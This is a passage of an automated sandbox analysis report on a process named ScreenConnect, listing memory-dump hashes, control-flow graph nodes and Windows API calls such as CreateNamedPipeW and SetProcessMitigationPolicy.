                                                                                              • Instruction Fuzzy Hash: 8D012BB28043409AE7144A25ECC4B67BFD8DF51B35F18C419EC190B28AC2799841E7B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3024385425.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_f3d000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 01e453d9dc9d2c7c55b666aa472e54f1ecf2f68713b98a9be45868934eb76e86
                                                                                              • Instruction ID: ec4c834b45ea0b98219c18ec30eb53a619c16e04caabb44cfab6d4408a9bf16b
                                                                                              • Opcode Fuzzy Hash: 01e453d9dc9d2c7c55b666aa472e54f1ecf2f68713b98a9be45868934eb76e86
                                                                                              • Instruction Fuzzy Hash: 14018C6240E3C09ED7128B258C94B52BFB4DF53634F0D80DBE8888F1E7C2699848C772
                                                                                              APIs
                                                                                              • RtlGetVersion.NTDLL(0000009C), ref: 01904DBE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3028043168.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_1900000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version
                                                                                              • String ID: `Q^q
                                                                                              • API String ID: 1889659487-1948671464
                                                                                              • Opcode ID: d947838d102ba93fab9a64c0c650b906d2674e25c4a2865f2b85897241580d8a
                                                                                              • Instruction ID: 6bbbd84cd7186aa9d8c2acbdbb04d17b8ace111ab2b50eb2aad2a47ce1d41735
                                                                                              • Opcode Fuzzy Hash: d947838d102ba93fab9a64c0c650b906d2674e25c4a2865f2b85897241580d8a
                                                                                              • Instruction Fuzzy Hash: B8212571901228DEEB60DF19C844B99FBBAFB05715F0085D9D10CA7680C7756A98CFA2

                                                                                              Execution Graph

                                                                                              Execution Coverage:13.2%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:11
                                                                                              Total number of Limit Nodes:1
                                                                                              execution_graph 25020 7ffd9b288014 25021 7ffd9b28801d 25020->25021 25022 7ffd9b288082 25021->25022 25023 7ffd9b2880f6 SetProcessMitigationPolicy 25021->25023 25024 7ffd9b288152 25023->25024 25029 7ffd9b2a5845 25030 7ffd9b2a5851 CreateNamedPipeW 25029->25030 25032 7ffd9b2a59a3 25030->25032 25025 7ffd9b2a59e1 25026 7ffd9b2a59ef ConnectNamedPipe 25025->25026 25028 7ffd9b2a5ac2 25026->25028

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 208 7ffd9b596c90-7ffd9b596cb7 211 7ffd9b596cb8 208->211 212 7ffd9b596cb9-7ffd9b596cdc 208->212 211->212 212->211 215 7ffd9b596cde-7ffd9b596d27 212->215 220 7ffd9b596d28 215->220 221 7ffd9b596d29-7ffd9b596d4c 215->221 220->221 221->220 224 7ffd9b596d4e-7ffd9b596e2c 221->224 238 7ffd9b596e76-7ffd9b596e86 224->238 239 7ffd9b596e2e-7ffd9b596e4a 224->239 247 7ffd9b596e88-7ffd9b596e8a 238->247 248 7ffd9b596e8c-7ffd9b596e9a call 7ffd9b5900a8 238->248 240 7ffd9b597258-7ffd9b597276 call 7ffd9b590c30 * 2 239->240 241 7ffd9b596e50-7ffd9b596e6e call 7ffd9b590c30 * 2 239->241 259 7ffd9b59727c-7ffd9b597283 240->259 260 7ffd9b597382-7ffd9b59738d 240->260 257 7ffd9b5970ee-7ffd9b59710c call 7ffd9b590c30 * 2 241->257 258 7ffd9b596e74-7ffd9b596e75 241->258 251 7ffd9b596e9d-7ffd9b596eb2 247->251 248->251 261 7ffd9b596eb8-7ffd9b596edc call 7ffd9b596a10 * 2 251->261 262 7ffd9b596eb4-7ffd9b596eb6 251->262 281 7ffd9b597136-7ffd9b597154 call 7ffd9b590c30 * 2 257->281 282 7ffd9b59710e-7ffd9b597118 257->282 258->238 264 7ffd9b597285-7ffd9b597294 259->264 265 7ffd9b597296-7ffd9b597298 259->265 267 7ffd9b596edf-7ffd9b596ef4 261->267 262->267 264->265 273 7ffd9b59729a 264->273 266 7ffd9b59729f-7ffd9b5972c3 265->266 278 7ffd9b5972c5-7ffd9b5972e2 266->278 279 7ffd9b59730f-7ffd9b59731d 266->279 283 7ffd9b596ef6-7ffd9b596ef8 267->283 284 7ffd9b596efa-7ffd9b596f1e call 7ffd9b596a10 * 2 267->284 273->266 294 7ffd9b5972e8-7ffd9b59730d 278->294 295 7ffd9b59738e-7ffd9b597407 278->295 279->260 310 7ffd9b59715a-7ffd9b597165 281->310 311 7ffd9b59720b-7ffd9b597216 281->311 288 7ffd9b59711a-7ffd9b59712a 282->288 289 7ffd9b59712c 282->289 290 7ffd9b596f21-7ffd9b596f36 283->290 284->290 292 7ffd9b59712e-7ffd9b59712f 288->292 289->292 303 7ffd9b596f38-7ffd9b596f3a 290->303 304 7ffd9b596f3c-7ffd9b596f60 call 7ffd9b596a10 290->304 292->281 294->279 315 7ffd9b597409-7ffd9b59744d 295->315 316 7ffd9b597450-7ffd9b5974a6 295->316 308 7ffd9b596f63-7ffd9b596f71 303->308 304->308 323 7ffd9b596f77-7ffd9b596f85 call 7ffd9b5900a8 308->323 324 7ffd9b596f73-7ffd9b596f75 308->324 321 7ffd9b597167-7ffd9b597169 310->321 322 7ffd9b59716b-7ffd9b59717a call 7ffd9b5900a8 310->322 325 7ffd9b597218-7ffd9b59721a 311->325 326 7ffd9b59721c-7ffd9b59722b call 7ffd9b5900a8 311->326 315->316 349 7ffd9b5974a8-7ffd9b5974a9 316->349 350 7ffd9b5974ac-7ffd9b5974d0 316->350 331 7ffd9b59717d-7ffd9b5971b1 321->331 322->331 333 7ffd9b596f88-7ffd9b596f91 323->333 324->333 327 7ffd9b59722e-7ffd9b597230 325->327 326->327 327->260 336 7ffd9b597236-7ffd9b597257 327->336 331->311 342 7ffd9b5971b3-7ffd9b5971c1 331->342 355 7ffd9b596f98-7ffd9b596f9f 333->355 346 7ffd9b5971c3-7ffd9b5971cb 342->346 347 7ffd9b5971d4-7ffd9b5971dc 342->347 352 7ffd9b5971dd-7ffd9b5971de 346->352 353 7ffd9b5971cd-7ffd9b5971d2 346->353 347->352 354 7ffd9b5971ee-7ffd9b597208 347->354 349->350 369 7ffd9b597502-7ffd9b59750b 350->369 370 7ffd9b5974d2-7ffd9b5974e1 350->370 357 7ffd9b5971e3-7ffd9b5971ed call 7ffd9b596a48 352->357 353->357 354->311 355->257 358 7ffd9b596fa5-7ffd9b596fac 355->358 357->354 358->257 363 7ffd9b596fb2-7ffd9b596fc9 358->363 375 7ffd9b596fcb-7ffd9b596fdd 363->375 376 7ffd9b596ffe-7ffd9b597009 363->376 373 7ffd9b5974e7-7ffd9b597501 370->373 374 7ffd9b5974e3-7ffd9b5974e4 370->374 374->373 383 7ffd9b596fdf-7ffd9b596fe1 375->383 384 7ffd9b596fe3-7ffd9b596ff1 call 7ffd9b5900a8 375->384 381 7ffd9b59700b-7ffd9b59700d 376->381 382 7ffd9b59700f-7ffd9b59701e call 7ffd9b5900a8 376->382 385 7ffd9b597021-7ffd9b597023 381->385 382->385 387 7ffd9b596ff4-7ffd9b596ff7 383->387 384->387 390 7ffd9b5970d8-7ffd9b5970ed 385->390 391 7ffd9b597029-7ffd9b597040 385->391 387->376 390->257 391->390 395 7ffd9b597046-7ffd9b597063 391->395 398 7ffd9b597065-7ffd9b59706d 395->398 399 7ffd9b59706f 395->399 400 7ffd9b597071-7ffd9b597073 398->400 399->400 400->390 402 7ffd9b597075-7ffd9b59707f 400->402 403 7ffd9b59708d-7ffd9b597095 402->403 404 7ffd9b597081-7ffd9b59708b call 7ffd9b593cc0 402->404 406 7ffd9b597097-7ffd9b5970bc call 7ffd9b5956a8 403->406 407 7ffd9b5970c3-7ffd9b5970d6 call 7ffd9b596a38 403->407 404->257 404->403 406->407 407->257
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: H
                                                                                              • API String ID: 0-2852464175
                                                                                              • Opcode ID: c94204a09687c4b0474729992da195033d4006381639e392f4d50769ef2d7957
                                                                                              • Instruction ID: cfb8d8cbf8b1f06cceb8f6c9893097917d99509ead8b498098a75bbf22270e3a
                                                                                              • Opcode Fuzzy Hash: c94204a09687c4b0474729992da195033d4006381639e392f4d50769ef2d7957
                                                                                              • Instruction Fuzzy Hash: 21421821B0EA4A4FF7E697A884746B977E2EF85340F9A007AD44DC71F7DE29B9058340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21b515a6c0c91c941d3fd5cb87cc67aee37bc22d27a765d90f8dc63700785f17
                                                                                              • Instruction ID: 8b7746f32fb75970044209095d962054863f87b35355004ddf8e2b08031f45d9
                                                                                              • Opcode Fuzzy Hash: 21b515a6c0c91c941d3fd5cb87cc67aee37bc22d27a765d90f8dc63700785f17
                                                                                              • Instruction Fuzzy Hash: 8F024772B0EA4E4BFBFA9B6854742B433E1EF95340F9600B9D85DC71E7DD28A9068341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 018e7c5a27bcf0fd344c6915c3f992513ef4a68dae9653c268a6eed47e79d3b3
                                                                                              • Instruction ID: bd29011c61f556707a1317d50f20d89fddf3e4673a9025c2312af08b1af466b7
                                                                                              • Opcode Fuzzy Hash: 018e7c5a27bcf0fd344c6915c3f992513ef4a68dae9653c268a6eed47e79d3b3
                                                                                              • Instruction Fuzzy Hash: E302E37171DA4A8FEBA9EF288465AB573E1FFA8340F40407ED44EC32A7DE24B9458741
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B283000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B283000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b283000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2f28859f09520ef15bc0d62c584bb5bf02b00472dcc0a7cf388606947ab6c1a5
                                                                                              • Instruction ID: 05e88fdb71d83c7a0cbb824521089ce7e1c36e7468b1d4c6322bc1c25602384c
                                                                                              • Opcode Fuzzy Hash: 2f28859f09520ef15bc0d62c584bb5bf02b00472dcc0a7cf388606947ab6c1a5
                                                                                              • Instruction Fuzzy Hash: 75D10522F0ED5A4BE779EAAC98716FD3791EF80314F0A01BAD45DC71FBDD28A9418241

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ?K_I$K_^^
                                                                                              • API String ID: 0-702756016
                                                                                              • Opcode ID: b95643f6b977dc612596764b72b49dc5544cbcbde6a422198d8c2c6838e2c1ec
                                                                                              • Instruction ID: 6a13d0580393707e0959cd650ce248507cfca5d1992b6ce842b50521bea4cc7b
                                                                                              • Opcode Fuzzy Hash: b95643f6b977dc612596764b72b49dc5544cbcbde6a422198d8c2c6838e2c1ec
                                                                                              • Instruction Fuzzy Hash: 6BD14D2370F98E4FF724AAAD78654EA7B91FFD137471543BBD48CC60ABE91469068380

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 167 7ffd9b28f0d5-7ffd9b28f141 176 7ffd9b28f196 167->176 177 7ffd9b28f143-7ffd9b28f195 167->177 178 7ffd9b28f197-7ffd9b28f1d9 176->178 177->176 177->178 188 7ffd9b28f1db-7ffd9b28f229 178->188 189 7ffd9b28f22d-7ffd9b28f244 178->189 188->189 197 7ffd9b28f246-7ffd9b28f269 189->197 198 7ffd9b28f29b-7ffd9b28f29d 189->198 201 7ffd9b28f29e-7ffd9b28f2d8 call 7ffd9b28e130 198->201
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: SK_^$UK_I
                                                                                              • API String ID: 0-3158764453
                                                                                              • Opcode ID: dbea9fb42d1700c03628ca0f738c5f92fbbedd83a87acf1353866448a8ba9d7b
                                                                                              • Instruction ID: 927839f623ebd56ae19ec4522ce1949bd0045a5a8c11297f1b49e28b2c0139ce
                                                                                              • Opcode Fuzzy Hash: dbea9fb42d1700c03628ca0f738c5f92fbbedd83a87acf1353866448a8ba9d7b
                                                                                              • Instruction Fuzzy Hash: DB514857B0FAC60FE7629A6CA8B14D97B50EF5122474A02F7D4D88B0EFE9146A078341

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 594 7ffd9b2a5845-7ffd9b2a584f 595 7ffd9b2a5856-7ffd9b2a586d 594->595 596 7ffd9b2a5851 594->596 598 7ffd9b2a586e 595->598 599 7ffd9b2a586f-7ffd9b2a58da 595->599 596->595 597 7ffd9b2a5853 596->597 597->595 598->599 601 7ffd9b2a58dc-7ffd9b2a58e1 599->601 602 7ffd9b2a58e4-7ffd9b2a59a1 CreateNamedPipeW 599->602 601->602 604 7ffd9b2a59a9-7ffd9b2a59dc 602->604 605 7ffd9b2a59a3 602->605 605->604
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B2A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b2a3000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2489174969-0
                                                                                              • Opcode ID: bc89b94b23ec4f997c94b98b8a183f7fd9f204c61365a498ea5e1f1d0012a602
                                                                                              • Instruction ID: 360945f99ae8bdd1760fa8a5cfba8461e753c09de531967eb3d58727d20e3f47
                                                                                              • Opcode Fuzzy Hash: bc89b94b23ec4f997c94b98b8a183f7fd9f204c61365a498ea5e1f1d0012a602
                                                                                              • Instruction Fuzzy Hash: 9751C17191CA5C9FDB68DF589815BE5BBE0FB59320F0442AEE04DD3252CB34A9858BC2

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B283000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B283000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b283000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: MitigationPolicyProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1088084561-0
                                                                                              • Opcode ID: d8f068d945c9387eecc7900542293ce628dc41a923e4f5df642e7bb73e9588cf
                                                                                              • Instruction ID: d18b8fbbb47611fe908fd659388c12334aef9e9ab21adf142e4dc85c3c8c75f6
                                                                                              • Opcode Fuzzy Hash: d8f068d945c9387eecc7900542293ce628dc41a923e4f5df642e7bb73e9588cf
                                                                                              • Instruction Fuzzy Hash: B1514931D0CB598FEB25AFA8884A9E97BE0EF55311F04017EE449C3192DE78A8468791

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 625 7ffd9b2a59e1-7ffd9b2a59ed 626 7ffd9b2a59f8-7ffd9b2a5ac0 ConnectNamedPipe 625->626 627 7ffd9b2a59ef-7ffd9b2a59f7 625->627 631 7ffd9b2a5ac8-7ffd9b2a5b0f call 7ffd9b2a5b11 626->631 632 7ffd9b2a5ac2 626->632 627->626 632->631
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B2A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b2a3000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectNamedPipe
                                                                                              • String ID:
                                                                                              • API String ID: 2191148154-0
                                                                                              • Opcode ID: df018c5da2eec84316c41d6961d524985a39d3c3e490cb3699d0e5f65a796cdd
                                                                                              • Instruction ID: 5aceed717e05843ec0bba5e9dbe3ad39c022ccb96e42fa2c709ac133b4ff6ed6
                                                                                              • Opcode Fuzzy Hash: df018c5da2eec84316c41d6961d524985a39d3c3e490cb3699d0e5f65a796cdd
                                                                                              • Instruction Fuzzy Hash: 3141B430E08A5D8FDB58EF98C849BE9BBF0FF55311F00426AD448D7296CB74A945CB81

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 704 7ffd9b283aa2-7ffd9b2880ef 706 7ffd9b2880f6-7ffd9b288150 SetProcessMitigationPolicy 704->706 707 7ffd9b288158-7ffd9b288187 706->707 708 7ffd9b288152 706->708 708->707
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B283000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B283000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b283000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: MitigationPolicyProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1088084561-0
                                                                                              • Opcode ID: 96609f3e703b6ca1ba19fcaaa67b9a57c74f8f7e80d62d54797321b4f4f6ba9c
                                                                                              • Instruction ID: 12cb08e3ccf0d7d520e9c526d68e1cdbe619712ec20e70f42cfd7fa7d3a366db
                                                                                              • Opcode Fuzzy Hash: 96609f3e703b6ca1ba19fcaaa67b9a57c74f8f7e80d62d54797321b4f4f6ba9c
                                                                                              • Instruction Fuzzy Hash: 6D21D731918B188FDB28AF9D984AAF977E0EB65711F00412EE049D3251DB74B8458B91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Q_H
                                                                                              • API String ID: 0-50712008
                                                                                              • Opcode ID: c2646009a0ede07a89409ff73b2edd2471166912a14b48f0261886db49a7344b
                                                                                              • Instruction ID: 280316203d84b67e26913fc70674fb038825603f6881fa540b5fc47154910755
                                                                                              • Opcode Fuzzy Hash: c2646009a0ede07a89409ff73b2edd2471166912a14b48f0261886db49a7344b
                                                                                              • Instruction Fuzzy Hash: C451B472B1DE4D4FEBA8DA5C88B96BC73D1EF98340B0500BDD45DD32E6DD2AA9028341
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AK_L
                                                                                              • API String ID: 0-1013632581
                                                                                              • Opcode ID: ed36a25cfbeb053490e06615b4af9495400392b52796d244eff0831c19840ea9
                                                                                              • Instruction ID: 6e78676fd2234be6577e2aff4b66c3ca1ecac3002ea613230a876e1b95fd94ab
                                                                                              • Opcode Fuzzy Hash: ed36a25cfbeb053490e06615b4af9495400392b52796d244eff0831c19840ea9
                                                                                              • Instruction Fuzzy Hash: 5A414862B1ED8A4FE768FA6CA4A59B833D1FF9834071401BAD45EC71E6DD24BD024382
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AK_L
                                                                                              • API String ID: 0-1013632581
                                                                                              • Opcode ID: d2feb2d0e5ee24164f9cac5a237162e29dd93f552bd195720b9ec8e05abfdcac
                                                                                              • Instruction ID: 3c37b62cd404a3a81118e01740cc573e0fefcd0aa015b43b31740b07736890f2
                                                                                              • Opcode Fuzzy Hash: d2feb2d0e5ee24164f9cac5a237162e29dd93f552bd195720b9ec8e05abfdcac
                                                                                              • Instruction Fuzzy Hash: 63313672B2AE8B4BE768FA6C94A59B833D1FFA43407150179D85EC71EAED24BD024341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4e8141444ee346c9a335247342eb72d90eac82e646722f0fe1169d14481719cc
                                                                                              • Instruction ID: dbd9afa8149c6b90dcc66d2cb48614a5d2b274c80ab3dfd0260b05b861ea2c38
                                                                                              • Opcode Fuzzy Hash: 4e8141444ee346c9a335247342eb72d90eac82e646722f0fe1169d14481719cc
                                                                                              • Instruction Fuzzy Hash: 2D123A32B0EA4A4FE7EAEB6C84756B437E1EF55710F8904BAD48DC71A3DD18A9428340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2a7bd2006a9b30164300c5e541bbb1c42bc50718d7d5fc3b7b7eee55e91c18ed
                                                                                              • Instruction ID: f2d376ae3ca92c45a5f149bbf909d0ffecc1927a8673c6ad40b8bc9cff55750f
                                                                                              • Opcode Fuzzy Hash: 2a7bd2006a9b30164300c5e541bbb1c42bc50718d7d5fc3b7b7eee55e91c18ed
                                                                                              • Instruction Fuzzy Hash: A9C13A32B0EE4A4BFBBAEB6884628B577E1EF54350784017DD44D871D7ED25BE0A8381
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 586fbfca14a2d1ab0c4ff99681d18ca82f08d9fee0675e7477f45ce26c2fd17e
                                                                                              • Instruction ID: eccb0abe425d58ff74f8ffc9376eb24463ce3158fc7b325569c01a86ff46892b
                                                                                              • Opcode Fuzzy Hash: 586fbfca14a2d1ab0c4ff99681d18ca82f08d9fee0675e7477f45ce26c2fd17e
                                                                                              • Instruction Fuzzy Hash: 24B11931B0DE4E4FEBA8EB6C8461AA977D1EF98340F1541BAD05DC72D6DE34AD028781
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f8b93f1de4fa24d19f8fcd6f6e15871a28eeb2d59334919e188a2ee2c37184ca
                                                                                              • Instruction ID: dd8698923724bf67638bedb665cf171ee90840517eb91baa595989a5d5e5f179
                                                                                              • Opcode Fuzzy Hash: f8b93f1de4fa24d19f8fcd6f6e15871a28eeb2d59334919e188a2ee2c37184ca
                                                                                              • Instruction Fuzzy Hash: 99B1E531B19E4E8FDF98EF6898A4AA977E1FF5930470401B9D41EC72A6DE34E942C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5bb4f4ee7ca9318928134d12bc346a32b79f4f6fd2c09cb2d868481cb349d674
                                                                                              • Instruction ID: 1949c67f219abc058a028023028c286fa488486b38cbb3ea9f28447184f6acc6
                                                                                              • Opcode Fuzzy Hash: 5bb4f4ee7ca9318928134d12bc346a32b79f4f6fd2c09cb2d868481cb349d674
                                                                                              • Instruction Fuzzy Hash: 9EA1B371709F4E8FDF98DF18C4A4A6937A2FFA9304B5505ADD419CB2A6DB35E802CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5535ef05fcdc2db18a65e8bde55f1cd7ec8b1f70cb6e80fbbf664be8bb22f2d9
                                                                                              • Instruction ID: 0e79c02d1ddd9f9acac13f84cad18e173c17da720da94fd070ae1cafe38499eb
                                                                                              • Opcode Fuzzy Hash: 5535ef05fcdc2db18a65e8bde55f1cd7ec8b1f70cb6e80fbbf664be8bb22f2d9
                                                                                              • Instruction Fuzzy Hash: 80913632B09D4D4FEBA5EB5C98A5B7677D1FFA8700B0501BAD44DC32A6DE29ED018341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8ce0c4f2a11258701e6c9a7d770f88c826f432193ec7e4a639fcf9c14b499880
                                                                                              • Instruction ID: 4de1b828cf3f147735220662677a2dea82dd34e17a633ba81abf7ac905845f3e
                                                                                              • Opcode Fuzzy Hash: 8ce0c4f2a11258701e6c9a7d770f88c826f432193ec7e4a639fcf9c14b499880
                                                                                              • Instruction Fuzzy Hash: 5791503470DA4A8FDBDDEF58C4A0AA177E2FF9930472445A9C059CB29BCA25EC87C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f7376b68a4143486680b320d906f4a20ed0fc68737cdb0a6e36b8d547f2f1526
                                                                                              • Instruction ID: f0119be6e2422057635b06e43410d024d8f0de278838146fd0a0b2d0c05d6864
